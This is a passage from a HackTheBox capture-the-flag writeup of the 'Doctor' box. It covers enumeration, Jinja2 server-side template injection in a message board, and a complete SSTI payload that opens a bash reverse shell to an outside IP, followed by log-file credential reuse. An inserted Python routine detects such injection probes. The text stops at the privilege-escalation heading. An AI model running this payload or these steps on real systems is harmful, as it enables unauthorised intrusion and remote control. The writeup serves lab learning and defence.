HackTheBox Writeup — Doctor

Hello guys, I am Faisal Husaini. My username on HTB is "feodore". Also join me on Discord.

The IP of this box is 10.10.10.209

Port Scan

We find 3 open ports: SSH, Apache and Splunk.

Moving towards the Web part first

Web

We can see the hostname doctors.htb on the website, so we add it to the hosts file and then check it in the browser.

We get a login page. I create a user, log in, and find a message posting functionality, where I inject some template injection payloads.

We don't see anything happening in the backend, but looking at the gobuster results, we see that there is an /archive directory.

Also, if we check the source code after login, it says that the directory is under beta testing.

The /archive page renders blank, but checking its source code we see that one of the payloads we injected got us a success.

Throughout my testing I figured out that the template engine being used is Jinja2.

Jinja2

So I used the payload below from PayloadsAllTheThings to get a reverse shell:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('bash -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"').read()}}{%endif%}{%endfor%}
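The message board above echoes user input into a Jinja2 template, which is why a posted message can reach the engine's object model. As an added example (not part of the original writeup), here is a small detection routine that flags such probes in posted message bodies before they are rendered; the message IDs and bodies are constructed samples.

```python
import re

# Markers that separate a Jinja2 template-injection probe from ordinary user
# text: template delimiters, dunder attribute walks, and OS-level sinks.
INDICATORS = {
    "jinja_expr":  re.compile(r"\{\{.*?\}\}", re.S),
    "jinja_stmt":  re.compile(r"\{%.*?%\}", re.S),
    "dunder_walk": re.compile(r"__(?:class|base|mro|subclasses|globals|builtins)__"),
    "os_sink":     re.compile(r"__import__|popen|subprocess|os\.system"),
}


def find_ssti_indicators(text):
    """Return the names of the indicators that fire on one message body."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_messages(messages):
    """messages: iterable of (message_id, body).

    Returns [(message_id, [indicator names])] for the bodies that match,
    in the order they were posted; clean messages are omitted.
    """
    hits = []
    for mid, body in messages:
        found = find_ssti_indicators(body)
        if found:
            hits.append((mid, found))
    return hits


# Constructed sample: three messages as a board like the one above might store them.
SAMPLE_MESSAGES = [
    (1, "Hello doctor, when is the clinic open?"),
    (2, "{{7*7}}"),
    (3, "{% for x in ().__class__.__base__.__subclasses__() %}...{% endfor %}"),
]

if __name__ == "__main__":
    for mid, found in scan_messages(SAMPLE_MESSAGES):
        print(f"message {mid}: {', '.join(found)}")
```

The indicators catch the probe at input time; the real fix is to pass user content to the template as a variable rather than building template source from it.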

We got a reverse shell and now move towards user escalation.

The current user, web, is a member of the adm group, which has read permission on various log files.

One of the log files leaks a password, which we try for the user shaun.

Privilege Escalation
